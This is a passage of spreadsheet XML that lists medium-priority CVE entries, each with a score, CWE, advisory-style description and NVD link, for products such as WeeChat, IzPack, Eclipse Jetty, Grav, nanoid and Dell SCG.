    <row r="2905">
      <c r="A2905" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2905" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53525</t>
        </is>
      </c>
      <c r="C2905" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2905" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2905" s="5" t="inlineStr"/>
      <c r="F2905" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2905" s="5" t="inlineStr"/>
      <c r="H2905" s="5" t="inlineStr"/>
      <c r="I2905" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2905" s="5" t="inlineStr"/>
      <c r="K2905" s="5" t="inlineStr">
        <is>
          <t>CWE-208</t>
        </is>
      </c>
      <c r="L2905" s="5" t="inlineStr">
        <is>
          <t>WeeChat (Wee Enhanced Environment for Chat) is a free chat client. In versions 0.3.1 through 4.9.0, the WeeChat relay authentication uses non-constant-time string comparison functions (weechat_strcasecmp and strcmp) to verify password hashes and plaintext passwords. An attacker can exploit timing differences to extract the server-computed hash character by character, then authenticate using the correct hash without knowing the password. Version 4.9.1 fixes the issue.</t>
        </is>
      </c>
      <c r="M2905" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53525</t>
        </is>
      </c>
    </row>
    <row r="2906">
      <c r="A2906" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2906" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54550</t>
        </is>
      </c>
      <c r="C2906" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2906" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2906" s="5" t="inlineStr"/>
      <c r="F2906" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2906" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2906" s="5" t="inlineStr"/>
      <c r="I2906" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2906" s="5" t="inlineStr"/>
      <c r="K2906" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2906" s="5" t="inlineStr">
        <is>
          <t>IzPack is a widely used tool for packaging applications on the Java platform as cross-platform installers. In 5.2.6 and earlier, UnpackerBase.unpack() in izpack-installer/src/main/java/com/izforge/izpack/installer/unpacker/UnpackerBase.java obtains an attacker-controlled PackFile targetPath, passes it through IoHelper.translatePath(), which only converts separators, and constructs a File without normalizing parent-directory segments or enforcing destination containment. A malicious installer pack entry containing ../ sequences can therefore write outside the intended installation directory to startup folders, executable search paths, or other locations accessible with the victim's privileges when the victim runs the installer.</t>
        </is>
      </c>
      <c r="M2906" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54550</t>
        </is>
      </c>
    </row>
    <row r="2907">
      <c r="A2907" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2907" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56135</t>
        </is>
      </c>
      <c r="C2907" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2907" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2907" s="5" t="inlineStr"/>
      <c r="F2907" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2907" s="5" t="inlineStr"/>
      <c r="H2907" s="5" t="inlineStr"/>
      <c r="I2907" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J2907" s="5" t="inlineStr"/>
      <c r="K2907" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2907" s="5" t="inlineStr">
        <is>
          <t>In NTFS-3G through 2026.2.25, a heap-based buffer overflow exists in the function build_inherited_id() in libntfs-3g/security.c that allows an attacker to corrupt heap memory in the SUID-root ntfs-3g binary by crafting a malicious NTFS image. The overflow is triggered by creating a file in a crafted directory.</t>
        </is>
      </c>
      <c r="M2907" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56135</t>
        </is>
      </c>
    </row>
    <row r="2908">
      <c r="A2908" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2908" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5795</t>
        </is>
      </c>
      <c r="C2908" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2908" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2908" s="5" t="inlineStr"/>
      <c r="F2908" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2908" s="5" t="inlineStr"/>
      <c r="H2908" s="5" t="inlineStr">
        <is>
          <t>eclipse:jetty</t>
        </is>
      </c>
      <c r="I2908" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J2908" s="5" t="inlineStr"/>
      <c r="K2908" s="5" t="inlineStr">
        <is>
          <t>CWE-226, CWE-287</t>
        </is>
      </c>
      <c r="L2908" s="5" t="inlineStr">
        <is>
          <t>In Eclipse Jetty, the class JASPIAuthenticator initiates the authentication checks, which set two ThreadLocal variable.
Upon returning from the initial checks, there are conditions that cause an early return from the JASPIAuthenticator code without clearing those ThreadLocals.
A subsequent request using the same thread inherits the ThreadLocal values, leading to a broken access control and privilege escalation.</t>
        </is>
      </c>
      <c r="M2908" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5795</t>
        </is>
      </c>
    </row>
    <row r="2909">
      <c r="A2909" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2909" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62669</t>
        </is>
      </c>
      <c r="C2909" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2909" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2909" s="5" t="inlineStr"/>
      <c r="F2909" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2909" s="5" t="inlineStr"/>
      <c r="H2909" s="5" t="inlineStr"/>
      <c r="I2909" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2909" s="5" t="inlineStr"/>
      <c r="K2909" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L2909" s="5" t="inlineStr">
        <is>
          <t>Grav Login Plugin adds login, basic ACL, and session wide messages to Grav. Prior to 3.8.11, the Grav Login plugin login.regenerate2FASecret task checks only that the pending-session user exists rather than requiring $user-&gt;authorized. After submitting a victim's correct password, an attacker can invoke taskRegenerate2FASecret() during the pending TOTP challenge, overwrite twofa_secret, read the replacement secret from the response, calculate a valid code, and complete authentication without the victim's second factor. This issue is fixed in version 3.8.11.</t>
        </is>
      </c>
      <c r="M2909" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62669</t>
        </is>
      </c>
    </row>
    <row r="2910">
      <c r="A2910" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2910" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62906</t>
        </is>
      </c>
      <c r="C2910" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2910" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2910" s="5" t="inlineStr"/>
      <c r="F2910" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2910" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2910" s="5" t="inlineStr"/>
      <c r="I2910" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2910" s="5" t="inlineStr"/>
      <c r="K2910" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L2910" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in Microsoft Discovery Studio allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2910" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62906</t>
        </is>
      </c>
    </row>
    <row r="2911">
      <c r="A2911" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2911" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69347</t>
        </is>
      </c>
      <c r="C2911" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2911" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2911" s="5" t="inlineStr"/>
      <c r="F2911" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2911" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2911" s="5" t="inlineStr"/>
      <c r="I2911" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2911" s="5" t="inlineStr"/>
      <c r="K2911" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2911" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M2911" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69347</t>
        </is>
      </c>
    </row>
    <row r="2912">
      <c r="A2912" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2912" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70604</t>
        </is>
      </c>
      <c r="C2912" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2912" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2912" s="5" t="inlineStr"/>
      <c r="F2912" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2912" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2912" s="5" t="inlineStr"/>
      <c r="I2912" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2912" s="5" t="inlineStr"/>
      <c r="K2912" s="5" t="inlineStr">
        <is>
          <t>CWE-942</t>
        </is>
      </c>
      <c r="L2912" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.10, 40.9.3, 41.4.0, and 42.0.0, a custom scheme registered with supportFetchAPI: true but without corsEnabled: true was not subject to CORS enforcement. A page loaded from a remote origin could therefore fetch() or XMLHttpRequest that scheme cross-origin and read the full response body, rather than the read being blocked. Apps that serve sensitive data from such a scheme and load remote or untrusted content in a renderer are affected. This issue is fixed in versions 39.8.10, 40.9.3, 41.4.0, and 42.0.0.</t>
        </is>
      </c>
      <c r="M2912" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70604</t>
        </is>
      </c>
    </row>
    <row r="2913">
      <c r="A2913" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2913" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70666</t>
        </is>
      </c>
      <c r="C2913" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2913" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2913" s="5" t="inlineStr"/>
      <c r="F2913" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2913" s="5" t="inlineStr"/>
      <c r="H2913" s="5" t="inlineStr"/>
      <c r="I2913" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2913" s="5" t="inlineStr"/>
      <c r="K2913" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2913" s="5" t="inlineStr">
        <is>
          <t>Lemur manages TLS certificate creation. Prior to 1.9.3, an authority-role member could update acme_url through PUT /api/1/authorities/ without revalidation and direct setup_acme_client_no_retry to an attacker-controlled ACME server. ACME directory and order responses contain newNonce, newOrder, authorizations, and finalize URLs chosen by that server. The Lemur ClientV2 followed those URLs without requiring their host to match the configured directory host, allowing JWS-signed requests to internal services or cloud metadata endpoints. The issue required an ACME authority and a user authorized for that authority, but did not require global administrator privileges. The fix revalidates updates and introduces _PinnedClientNetwork to enforce a single allowed host for the complete ACME flow. This issue is fixed in version 1.9.3.</t>
        </is>
      </c>
      <c r="M2913" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70666</t>
        </is>
      </c>
    </row>
    <row r="2914">
      <c r="A2914" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2914" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71375</t>
        </is>
      </c>
      <c r="C2914" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2914" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2914" s="5" t="inlineStr"/>
      <c r="F2914" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2914" s="5" t="inlineStr"/>
      <c r="H2914" s="5" t="inlineStr"/>
      <c r="I2914" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2914" s="5" t="inlineStr"/>
      <c r="K2914" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="L2914" s="5" t="inlineStr">
        <is>
          <t>Improper restriction of XML external entity reference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M2914" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71375</t>
        </is>
      </c>
    </row>
    <row r="2915">
      <c r="A2915" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2915" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71622</t>
        </is>
      </c>
      <c r="C2915" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2915" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2915" s="5" t="inlineStr"/>
      <c r="F2915" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2915" s="5" t="inlineStr"/>
      <c r="H2915" s="5" t="inlineStr"/>
      <c r="I2915" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2915" s="5" t="inlineStr"/>
      <c r="K2915" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L2915" s="5" t="inlineStr">
        <is>
          <t>SQL injection vulnerability in Zhao-github APiAdmin v.5.0.1 allows a remote attacker to obtain sensitive information via the User.php component</t>
        </is>
      </c>
      <c r="M2915" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71622</t>
        </is>
      </c>
    </row>
    <row r="2916">
      <c r="A2916" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2916" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73086</t>
        </is>
      </c>
      <c r="C2916" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2916" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2916" s="5" t="inlineStr"/>
      <c r="F2916" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2916" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2916" s="5" t="inlineStr"/>
      <c r="I2916" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2916" s="5" t="inlineStr"/>
      <c r="K2916" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2916" s="5" t="inlineStr">
        <is>
          <t>nanoid is a secure, URL-friendly, unique string ID generator for JavaScript. Prior to versions 3.3.12 and 5.1.11, the nanoid(size) function in index.js and index.cjs coerces the user-influenced size parameter to a signed 32-bit integer, allowing a value of 2147483648 to become -2147483648 and corrupt the process-wide CSPRNG poolOffset in fillPool(), which causes subsequent session tokens, CSRF tokens, API keys, and unique identifiers to become the deterministic string "uuuuuuuuuuuuuuuuuuuuu" until the process restarts. This issue is fixed in versions 3.3.12 and 5.1.11.</t>
        </is>
      </c>
      <c r="M2916" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73086</t>
        </is>
      </c>
    </row>
    <row r="2917">
      <c r="A2917" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2917" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73495</t>
        </is>
      </c>
      <c r="C2917" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2917" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2917" s="5" t="inlineStr"/>
      <c r="F2917" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2917" s="5" t="inlineStr"/>
      <c r="H2917" s="5" t="inlineStr"/>
      <c r="I2917" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2917" s="5" t="inlineStr"/>
      <c r="K2917" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L2917" s="5" t="inlineStr">
        <is>
          <t>blaze is a Scala library for building asynchronous pipelines, with a focus on network IO. Prior to 0.23.18 and 1.0.0-M42, blaze-server can merge HTTP/1.1 chunked-body trailer fields into Request.headers. Because trailer fields are attacker-controlled, an unauthenticated remote client can inject arbitrary header names and values, including X-Forwarded-For and internal authorization headers, that a fronting proxy sanitized from the request-header section, bypassing header-based trust decisions in the application. Any http4s application using BlazeServerBuilder over HTTP/1.1 whose routes or middleware trust proxy-set headers, including X-Forwarded-For, X-Real-IP, and X-Forwarded-Host, is affected. If a fronting proxy strips or normalizes those headers but forwards chunked bodies with trailers intact, an attacker can spoof client IP for allow-lists, rate limits, or auditing, forge the https scheme, or inject internal authorization headers. A promoted Connection: close trailer is also honored, allowing attacker-controlled termination of pooled backend connections. This issue is fixed in versions 0.23.18 and 1.0.0-M42.</t>
        </is>
      </c>
      <c r="M2917" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73495</t>
        </is>
      </c>
    </row>
    <row r="2918">
      <c r="A2918" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2918" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76196</t>
        </is>
      </c>
      <c r="C2918" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2918" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2918" s="5" t="inlineStr"/>
      <c r="F2918" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2918" s="5" t="inlineStr"/>
      <c r="H2918" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop_mobile</t>
        </is>
      </c>
      <c r="I2918" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2918" s="5" t="inlineStr"/>
      <c r="K2918" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="L2918" s="5" t="inlineStr">
        <is>
          <t>Photoshop Mobile is affected by a Session Fixation vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain access to sensitive resources. Exploit depends on conditions beyond the attacker's control. Exploitation of this issue requires user interaction in that a victim must interact with a malicious webpage. Scope is changed.</t>
        </is>
      </c>
      <c r="M2918" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76196</t>
        </is>
      </c>
    </row>
    <row r="2919">
      <c r="A2919" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2919" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78254</t>
        </is>
      </c>
      <c r="C2919" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2919" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2919" s="5" t="inlineStr"/>
      <c r="F2919" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2919" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2919" s="5" t="inlineStr">
        <is>
          <t>apache:ant</t>
        </is>
      </c>
      <c r="I2919" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2919" s="5" t="inlineStr"/>
      <c r="K2919" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L2919" s="5" t="inlineStr">
        <is>
          <t>The ftp and scp tasks of Apache Ant can download files from a remote server. A malicious server can provide relative paths that allow it to write outside of the dedicated target directory for the download, making it possible to overwrite files of the attacker's choice using the permissions of the user running Ant in versions prior to Ant 1.10.18. 
In order to exploit this vulnerability, the server would either have to be malicious or be subject to a machine-in-the-middle attack. Additionally in the case of scp or the ftp task using ftps the server must pass the server identity checks performed by the tasks.
For ftp tasks not using ftps a malicious server could act as a machine-in-the-middle to provide malicious files.
Starting with Ant 1.10.18 both tasks will prevent writing outside of the destination directory by default. An option is available to disable this behavior in the unlikely case that the  old behavior is required by existing build files.
Mitigations:
Users of scp and ftp (when using ftps) in any version of Ant should not bypass server identity checks. Users of ftp not using ftps should switch to ftps where possible.
All users are recommended to upgrade to Apache Ant 1.10.18, which fixes this issue.</t>
        </is>
      </c>
      <c r="M2919" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78254</t>
        </is>
      </c>
    </row>
    <row r="2920">
      <c r="A2920" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2920" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78461</t>
        </is>
      </c>
      <c r="C2920" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2920" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2920" s="5" t="inlineStr"/>
      <c r="F2920" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2920" s="5" t="inlineStr"/>
      <c r="H2920" s="5" t="inlineStr"/>
      <c r="I2920" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2920" s="5" t="inlineStr"/>
      <c r="K2920" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2920" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M2920" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78461</t>
        </is>
      </c>
    </row>
    <row r="2921">
      <c r="A2921" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2921" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78492</t>
        </is>
      </c>
      <c r="C2921" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2921" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2921" s="5" t="inlineStr"/>
      <c r="F2921" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2921" s="5" t="inlineStr"/>
      <c r="H2921" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2921" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2921" s="5" t="inlineStr"/>
      <c r="K2921" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L292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2921" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78492</t>
        </is>
      </c>
    </row>
    <row r="2922">
      <c r="A2922" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2922" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78494</t>
        </is>
      </c>
      <c r="C2922" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2922" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2922" s="5" t="inlineStr"/>
      <c r="F2922" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2922" s="5" t="inlineStr"/>
      <c r="H2922" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2922" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2922" s="5" t="inlineStr"/>
      <c r="K2922" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L292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2922" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78494</t>
        </is>
      </c>
    </row>
    <row r="2923">
      <c r="A2923" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2923" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79644</t>
        </is>
      </c>
      <c r="C2923" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2923" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2923" s="5" t="inlineStr"/>
      <c r="F2923" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2923" s="5" t="inlineStr"/>
      <c r="H2923" s="5" t="inlineStr"/>
      <c r="I2923" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2923" s="5" t="inlineStr"/>
      <c r="K2923" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L292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2923" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79644</t>
        </is>
      </c>
    </row>
    <row r="2924">
      <c r="A2924" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2924" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79963</t>
        </is>
      </c>
      <c r="C2924" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2924" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2924" s="5" t="inlineStr"/>
      <c r="F2924" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2924" s="5" t="inlineStr"/>
      <c r="H2924" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2924" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2924" s="5" t="inlineStr"/>
      <c r="K2924" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="L2924" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Download of Code Without Integrity Check vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to command execution.</t>
        </is>
      </c>
      <c r="M2924" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79963</t>
        </is>
      </c>
    </row>
    <row r="2925">
      <c r="A2925" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2925" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80133</t>
        </is>
      </c>
      <c r="C2925" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2925" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2925" s="5" t="inlineStr"/>
      <c r="F2925" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2925" s="5" t="inlineStr"/>
      <c r="H2925" s="5" t="inlineStr"/>
      <c r="I2925" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2925" s="5" t="inlineStr"/>
      <c r="K2925" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L2925" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Relative Path Traversal vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to remote execution.</t>
        </is>
      </c>
      <c r="M2925" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80133</t>
        </is>
      </c>
    </row>
    <row r="2926">
      <c r="A2926" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2926" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80434</t>
        </is>
      </c>
      <c r="C2926" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2926" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2926" s="5" t="inlineStr"/>
      <c r="F2926" s="5" t="inlineStr"/>
      <c r="G2926" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
